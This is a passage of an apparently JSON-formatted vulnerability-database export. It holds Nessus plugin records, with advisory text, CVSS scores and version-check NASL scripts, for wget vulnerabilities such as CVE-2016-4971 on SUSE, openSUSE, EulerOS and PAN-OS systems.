Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1309=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1309=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T16:53:28", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget-debugsource", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-1067.NASL", "href": "https://www.tenable.com/plugins/nessus/93430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93430);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-19T13:50:30", "description": "According to the versions of the wget package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13089)\n\n - A flaw was found in the way Wget handled symbolic links. A malicious FTP server could allow Wget running in the mirror mode (using the '-m' command line option) to write an arbitrary file to a location writable to by the user running Wget, possibly leading to code execution.(CVE-2014-4877)\n\n - A cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.(CVE-2018-0494)\n\n - It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\n - A heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13090)\n\n - Race condition in wget 1.17 and earlier, when used in recursive or mirroring mode to download a single file, might allow remote servers to bypass intended access list restrictions by keeping an HTTP connection open.(CVE-2016-7098)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : wget (EulerOS-SA-2019-1417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4877", "CVE-2016-4971", "CVE-2016-7098", "CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:wget", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1417.NASL", "href": "https://www.tenable.com/plugins/nessus/124920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124920);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-4877\",\n \"CVE-2016-4971\",\n \"CVE-2016-7098\",\n \"CVE-2017-13089\",\n \"CVE-2017-13090\",\n \"CVE-2018-0494\"\n );\n script_bugtraq_id(\n 70751\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : wget (EulerOS-SA-2019-1417)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the wget package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A stack-based buffer overflow when processing chunked,\n encoded HTTP responses was found in wget. By tricking\n an unsuspecting user into connecting to a malicious\n HTTP server, an attacker could exploit this flaw to\n potentially execute arbitrary code.(CVE-2017-13089)\n\n - A flaw was found in the way Wget handled symbolic\n links. A malicious FTP server could allow Wget running\n in the mirror mode (using the '-m' command line option)\n to write an arbitrary file to a location writable to by\n the user running Wget, possibly leading to code\n execution.(CVE-2014-4877)\n\n - A cookie injection flaw was found in wget. An attacker\n can create a malicious website which, when accessed,\n overrides cookies belonging to arbitrary\n domains.(CVE-2018-0494)\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following a HTTP\n redirect to a FTP server resource. This could cause\n wget to create a file with a different name than\n expected, possibly allowing the server to execute\n arbitrary code on the client.(CVE-2016-4971)\n\n - A heap-based buffer overflow, when processing chunked\n encoded HTTP responses, was found in wget. By tricking\n an unsuspecting user into connecting to a malicious\n HTTP server, an attacker could exploit this flaw to\n potentially execute arbitrary code.(CVE-2017-13090)\n\n - Race condition in wget 1.17 and earlier, when used in\n recursive or mirroring mode to download a single file,\n might allow remote servers to bypass intended access\n list restrictions by keeping an HTTP connection\n open.(CVE-2016-7098)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1417\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a38e8a1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-13090\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-15.1.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:26:17", "description": "The version of Palo Alto Networks PAN-OS running on the remote host is 6.1.x prior to 6.1.17, 7.0.x prior to 7.0.15, 7.1.x prior to 7.1.10, or 8.0.x prior to 8.0.2. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the GNU wget component when handling server redirects to FTP resources due to the destination file name being obtained from the redirected URL and not the original URL. An unauthenticated, remote attacker can exploit this, via a specially crafted response, to cause a different file name to be used than intended, resulting in writing to arbitrary files. (CVE-2016-4971)\n\n - A flaw exists in the Linux kernel due to improper determination of the rate of challenge ACK segments. An unauthenticated, remote attacker can exploit this to gain access to the shared counter, which makes it easier to hijack TCP sessions using a blind in-window attack.\n This issue only affects version 7.1.x. (CVE-2016-5696)\n\n - An out-of-bounds read error exists when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. This issue does not affect version 6.1.x. (CVE-2017-3731)\n\n - A cross-site scripting (XSS) vulnerability exists in GlobalProtect due to improper validation of user-supplied input to unspecified request parameters before returning it to users. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. This issue only affects version 7.0.x.\n (CVE-2017-7409)\n\n - A flaw exists in the web-based management interface due to improper permission checks that allows an authenticated, remote attacker to disclose sensitive information. This issue only affects versions 6.1.x, 7.0.x, and 8.0.x. (CVE-2017-7644)\n\n - An information disclosure vulnerability exists in the GlobalProtect external interface due to returning different error messages when handling login attempts with valid or invalid usernames. An unauthenticated, remote attacker can exploit this to enumerate valid user accounts. This issue only affects versions 6.1.x, 7.0.x, and 8.0.x. (CVE-2017-7945)\n\n - A denial of service vulnerability exists in the firewall when handling stale responses to authentication requests prior to selecting CHAP or PAP as the protocol. An unauthenticated, remote attacker can exploit this to cause the authentication process (authd) to stop responding. This issue only affects versions 7.0.x and 7.1.x.\n\n - An information disclosure vulnerability exists when viewing changes in the configuration log due to the 'Auth Password' and 'Priv Password' for the SNMPv3 server profile not being properly masked. A local attacker can exploit this to disclose password information. This issue only affects versions 7.1.x and 8.0.x.\n\n - A denial of service vulnerability exists due to a flaw when handling HA3 messages. An unauthenticated, remote attacker can exploit this to cause several processes to stop. This issue only affects version 7.1.x.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-25T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS 6.1.x < 6.1.17 / 7.0.x < 7.0.15 / 7.1.x < 7.1.10 / 8.0.x < 8.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971", "CVE-2016-5696", "CVE-2017-3731", "CVE-2017-7409", "CVE-2017-7644", "CVE-2017-7945"], "modified": "2019-01-02T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-OS_7_0_15.NASL", "href": "https://www.tenable.com/plugins/nessus/100419", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100419);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/01/02 11:18:37\");\n\n script_cve_id(\n \"CVE-2016-4971\",\n \"CVE-2016-5696\",\n \"CVE-2017-3731\",\n \"CVE-2017-7409\",\n \"CVE-2017-7644\",\n \"CVE-2017-7945\"\n );\n script_bugtraq_id(\n 91530,\n 91704,\n 95813,\n 98404,\n 97953,\n 98396\n );\n script_xref(name:\"EDB-ID\", value:\"40064\");\n\n script_name(english:\"Palo Alto Networks PAN-OS 6.1.x < 6.1.17 / 7.0.x < 7.0.15 / 7.1.x < 7.1.10 / 8.0.x < 8.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the PAN-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Palo Alto Networks PAN-OS running on the remote host is\n6.1.x prior to 6.1.17, 7.0.x prior to 7.0.15, 7.1.x prior to 7.1.10,\nor 8.0.x prior to 8.0.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the GNU wget component when handling\n server redirects to FTP resources due to the destination\n file name being obtained from the redirected URL and not\n the original URL. An unauthenticated, remote attacker\n can exploit this, via a specially crafted response, to\n cause a different file name to be used than intended,\n resulting in writing to arbitrary files. (CVE-2016-4971)\n\n - A flaw exists in the Linux kernel due to improper\n determination of the rate of challenge ACK segments. An\n unauthenticated, remote attacker can exploit this to\n gain access to the shared counter, which makes it easier\n to hijack TCP sessions using a blind in-window attack.\n This issue only affects version 7.1.x. (CVE-2016-5696)\n\n - An out-of-bounds read error exists when handling packets\n using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted truncated packets, to cause a denial\n of service condition. This issue does not affect version\n 6.1.x. (CVE-2017-3731)\n\n - A cross-site scripting (XSS) vulnerability exists in\n GlobalProtect due to improper validation of\n user-supplied input to unspecified request parameters\n before returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in a user's\n browser session. This issue only affects version 7.0.x.\n (CVE-2017-7409)\n\n - A flaw exists in the web-based management interface due\n to improper permission checks that allows an\n authenticated, remote attacker to disclose sensitive\n information. This issue only affects versions 6.1.x,\n 7.0.x, and 8.0.x. (CVE-2017-7644)\n\n - An information disclosure vulnerability exists in the\n GlobalProtect external interface due to returning\n different error messages when handling login attempts\n with valid or invalid usernames. An unauthenticated,\n remote attacker can exploit this to enumerate valid\n user accounts. This issue only affects versions 6.1.x,\n 7.0.x, and 8.0.x. (CVE-2017-7945)\n\n - A denial of service vulnerability exists in the firewall\n when handling stale responses to authentication requests\n prior to selecting CHAP or PAP as the protocol. An\n unauthenticated, remote attacker can exploit this to\n cause the authentication process (authd) to stop\n responding. This issue only affects versions 7.0.x and\n 7.1.x.\n\n - An information disclosure vulnerability exists when\n viewing changes in the configuration log due to the\n 'Auth Password' and 'Priv Password' for the SNMPv3\n server profile not being properly masked. A local\n attacker can exploit this to disclose password\n information. This issue only affects versions 7.1.x and\n 8.0.x.\n\n - A denial of service vulnerability exists due to a flaw\n when handling HA3 messages. An unauthenticated, remote\n attacker can exploit this to cause several processes to\n stop. This issue only affects version 7.1.x.\n\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-2-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d96265b\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-1-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f083775\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-0-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aacbe40b\");\n # https://www.paloaltonetworks.com/documentation/71/pan-os/pan-os-release-notes/pan-os-7-1-10-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49c666f2\");\n # https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os-release-notes/pan-os-7-0-15-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fe505ba3\");\n # https://www.paloaltonetworks.com/documentation/61/pan-os/pan-os-release-notes/pan-os-6-1-17-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9254ef1a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Palo Alto Networks PAN-OS version 6.1.17 / 7.0.15 /\n7.1.10 / 8.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\n\napp_info = vcf::get_app_info(app:app_name, kb_ver:\"Host/Palo_Alto/Firewall/Full_Version\", webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n {\"min_version\" : \"8.0.0\", \"max_version\" : \"8.0.1\", \"fixed_version\" : \"8.0.2\" },\n {\"min_version\" : \"7.1.0\", \"max_version\" : \"7.1.9\", \"fixed_version\" : \"7.1.10\" },\n {\"min_version\" : \"7.0.0\", \"max_version\" : \"7.0.14\", \"fixed_version\" : \"7.0.15\" },\n {\"min_version\" : \"6.1.0\", \"max_version\" : \"6.1.16\", \"fixed_version\" : \"6.1.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xss:true});\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-09-06T11:00:07", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This 